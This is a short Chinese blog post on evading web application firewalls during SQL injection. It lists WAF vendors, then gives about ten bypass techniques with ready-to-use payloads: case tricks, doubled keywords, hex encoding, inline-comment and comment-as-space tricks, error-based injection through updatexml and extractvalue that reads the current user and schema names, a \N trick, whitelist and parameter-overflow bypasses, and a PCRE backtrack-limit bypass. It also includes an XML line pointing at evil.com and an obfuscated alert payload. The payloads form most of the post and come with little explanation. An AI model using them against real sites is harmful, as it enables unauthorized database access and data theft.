sql注入之waf绕过1()

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档


前言

Web应用防护系统(也称为:网站应用级入侵防御系统。英文:Web Application Firewall,简称:WAF)。 利用国际上公认的一种说法:Web应用防火墙是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应 用提供保护的一款产品。

提示:以下是本篇文章正文内容,下面案例可供参考

一、常见waf分类

把WAF分为4类:
云WAF类、硬件WAF类、软件WAF类、网站内置WAF类
1 、云 waf
安全宝创宇盾、玄武盾、腾讯云、百度云、西部数码、阿里云盾、奇安信网站卫士
2 、软件 WAF
D盾:http://www.d99net.net/
云锁:https://yunsuo.qianxin.com/
网防:http://www.weishi110.cn/static/index.html
安全狗:https://www.safedog.cn/
护卫神:https://www.hws.com/
智创:https://www.zcnt.com/
悬镜:https://www.xmirror.cn/
UPUPW:https://www.upupw.net/
WTS-WAF:https://www.west.cn/
安骑士:https://help.aliyun.com/product/28449.html
dotDefender:http://www.applicure.com/Products/
3 、硬件 WAF
绿盟:https://www.nsfocus.com.cn/
安恒:https://www.dbappsecurity.com.cn/
铱(yi)迅:https://www.yxlink.com/
天融信 深信服
启明星辰
知道创宇
F5 BIG-IP:https://www.f5.com/
4 、网站内置 WAF
在搭建网站的时候,有很多企业会选择自己写过滤的规则。那么这种绕过的姿势就需要根据网站的过滤规则来尝 试了。

二、绕过方法

1.大小写绕过

Or

aNd

2.双写绕过

oorr

anandd

aanndd      这样的绕过是错误的(waf检测到第一个and时会把and删除,剩下的字母依然能                    够组合成and绕过才算成功)

3.十六进制绕过

or ——> o\x72

4.ByPass模糊匹配

常用于过滤空格等

将空格替换为/*11*/ ,把11换成 !*/ 放入bp爆破

5.关键字内联

/*!union*/

/*!select*/

6.逻辑绕过

过滤代码 1 && (select user from users where user_id = 1) = 'admin'

绕过方式 1 && (select user from users limit 1) = 'admin'

7.生僻函数绕过

MySQL/PostgreSQL支持XML函数:Select UpdateXML(‘<script x=_></script> ’,’/script/@x/’,’src=//evil.com’);          

?id=1 and 1=(updatexml(1,concat(0x3a,(select user())),1))

SELECT xmlelement(name img,xmlattributes(1as src,'a\l\x65rt(1)'as \117n\x65rror)); //postgresql

?id=1 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

and 1=(updatexml(1,concat(0x5c,(select user()),0x5c),1))

and extractvalue(1, concat(0x5c, (select user()),0x5c))

8.\N绕过

id=\Nunion(select 1,schema_name,\Nfrom information_schema.schemata)

9.白名单绕过

利用 PHP 中的 PATH_INFO 问题,随便挑选一个白名单加在后面,可成功 bypas
静态资源
当文件后缀名为js jpg png 等静态资源后缀请求,类似白名单机制, waf 为了检测效率,直接略过这样一些静态资 源文件名后缀的请求。
参数溢出
比如某 WAF ,默认情况下只能获取前 100 个参数进行检测,当提交第 101
参数时,那么,将无法对攻击者提交的第 100 个以后的参数进行有效安全检测,从而绕过安全防御

10.PCRE绕过

PHP 的 pcre.backtrack_limit 限制利用

union/*aaaaaaaxN*/select

总结

未完待续

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值